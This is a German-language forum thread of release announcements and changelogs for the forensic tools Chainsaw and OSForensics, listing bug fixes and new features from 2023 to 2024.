Beitrag von: SiLæncer am 06 Juli, 2023, 21:30
Whats new:>>

This release contains the following changes of note:

    Fix mutually exclusive command line options -c can only be used with --jsonl
    Error if caching file cannot be created
    Make thread count is respected everywhere
    Better handling of sigma rules (warn on unknown modifiers, and support base64 conversions)
    additional optimisations to jsonl output

https://github.com/WithSecureLabs/chainsaw
Titel: Chainsaw 2.7.2
Beitrag von: SiLæncer am 09 Juli, 2023, 22:00
(https://i.postimg.cc/fywgtSMD/screenshot-2299.png)
Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

License: GPLv3

Whats new:>>

    More optimisations.
    Fix some issues with -t arguments.

https://github.com/WithSecureLabs/chainsaw
Titel: OSForensics 10.0.1015
Beitrag von: SiLæncer am 19 Juli, 2023, 19:00
(https://i.postimg.cc/VkxNN7rC/screenshot-2371.png)
OSForensics is an application that enables you to thoroughly check and scan a computer for any piece of evidence that might offer you insight, by checking anything from email archives, deleted files and even web browsing history. In addition, you can organize the evidence by creating separate cases, which can hold the data separate from each other.

Changelog

       
    Create Index:

    Fixed possible crash when using the 'Don't know/Prescan' option

    Logical Cloud Drive Imaging:

    OneDrive Fixed possible discrepancy between the file size when summing all the files and the drive size from querying the user's root. When creating a logical drive, it will use the maximum size between both methods.

    Password Decrypt:

    Brute Force Fixed bug when using Custom Random Dictionary for individual work queue items, the Brute Force settings were not being saved

    Search Index:

    Fixed issue when loading a UTF-8 wordlist file without a BOM

    User Activity:

    Fixed possible crash when using the 'Autorun Commands' option

[close]

http://www.osforensics.com/
Titel: Chainsaw 2.7.3
Beitrag von: SiLæncer am 16 August, 2023, 19:00
Whats new:>>

    New Chainsaw rules
    Fixing JSONL outputting issues for dump and search
    Updated dependencies

https://github.com/WithSecureLabs/chainsaw
Titel: Chainsaw 2.8.0
Beitrag von: SiLæncer am 08 Oktober, 2023, 10:00
Whats new:>>

Support for parsing ESE databases and analysing SRUM databases
New Chainsaw rules
Full output support for aggregations

https://github.com/WithSecureLabs/chainsaw
Titel: OSForensics 10.0.1016
Beitrag von: SiLæncer am 10 Oktober, 2023, 19:00
Whats new:>>

    File Name Search:

    Changed to show 'Multiple directories selected' in directory field instead of the first directory being scanned if multiple directories are selected
    Fixed issue where it would add to directories to scan rather than replacing them when switching between different directories

    Registry Viewer:

    Fixed bug where Time Zone values were incorrect (only first byte of integer value returned) when exporting System Hive

    User Activity:

    Fixed potential buffer overflow issue during the Event Log rendering

http://www.osforensics.com/
Titel: Chainsaw 2.8.1
Beitrag von: SiLæncer am 21 November, 2023, 22:00
Whats new:>>

    Fixes and tweaks for SRUM
    Updated dependencies

https://github.com/WithSecureLabs/chainsaw
Titel: OSForensics 11.0.1005
Beitrag von: SiLæncer am 28 Februar, 2024, 20:00
Changelog


    Deleted Files Search:

    Fixed recovered partitions not being scanned on first access
    Removed error message being displayed when invalid NTFS partition found (eg. recovered partitions)

    Manage Case:

    Fixed issue when adding new category and reordering immediately afterwards would not save the correct order
    Fixed issue where categories from pre-V11 cases would not sort properly
    Fixed issue where exporting categories would not included changes made in the current Edit case window
    Fixed issue where report was generating but does not complete properly until OSF is closed

    Misc:

    Updated WinPEBuilder to V1.2.108
    Fixed unable to boot on some older Win7 machines

[close]

http://www.osforensics.com/
Titel: OSForensics 11.0.1006
Beitrag von: SiLæncer am 04 März, 2024, 10:00
Changelog


    Email Viewer:

    Added warning message when system lacks Outlook MAPI library that exported MSG files will be saved in OLE format

    Hashing:

    Fixed possible crash when calculating hashes

    User Activity:

    Changed to auto-uncheck Moved Downloads if Downloads was unchecked (needs Download checked to run)

[close]

http://www.osforensics.com/
Titel: OSForensics 11.0.1007
Beitrag von: SiLæncer am 20 März, 2024, 09:00
Changelog


    Android Artifacts:

    Added destination target write permissions check before launching acquisition
    Fixed issue that OSFExtract-data.xml file was not created properly under certain conditions (e.g. Failed to create OSFExtract folder in the destination target)
    Fixed issue where the image was not loaded properly when the OSFExtract-data.xml file was placed in the root folder instead of in the OSFExtract folder
    Updated logs display format

    Deleted Files Search:

    Fixed hash calculation using "DirectAccess" version instead of "buffer" version of file

    Drive Preparation:

    Fixed issue where this module was unable to be run on Drive-0

    File Viewer:

    Fix lockup of internal viewer when attempting to read past media stream size

    Hash Sets:

    Updated to include total # files to hash in 'Files hashed' field
    Updated to display # files with errors

    Manage Case:

    Removed category ID column from Case Edit window - Case Categories tab

    User Activity:

    Fixed possible crash when scanning VLC .ini file
    Fixed issue where OSF is stuck scanning Event Logs on Linux
    Config, Changed to auto uncheck Moved Downloads if Downloads is unchecked

    Misc:

    Fixed possible crash when running USB install
    Updated OSFMount to V3.1.1003

[close]

http://www.osforensics.com/
Titel: Chainsaw 2.9.0
Beitrag von: SiLæncer am 15 April, 2024, 21:00
Whats new:>>

    More native rules
    Ability to change default conditional when searching
    Fix for setting of timezones

https://github.com/WithSecureLabs/chainsaw